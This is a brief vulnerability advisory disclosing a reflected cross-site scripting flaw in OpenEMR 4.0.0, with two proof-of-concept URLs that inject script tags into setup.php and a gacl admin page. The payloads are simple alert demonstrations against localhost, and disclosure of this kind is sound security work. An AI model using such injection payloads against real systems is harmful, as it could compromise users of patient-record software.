Home
Consulting
Advisories
Software
Articles
Contact

OpenEMR 4.0.0 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in OpenEMR 4.0.0 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/openemr-4.0.0/setup.php?site=%3Cscript%3Ealert(0)%3C/script%3E

http://localhost/openemr-4.0.0/gacl/admin/object_search.php?object_type=&action=&src_form=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E&section_value=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E


Copyright © 2018 AutoSec Tools LLC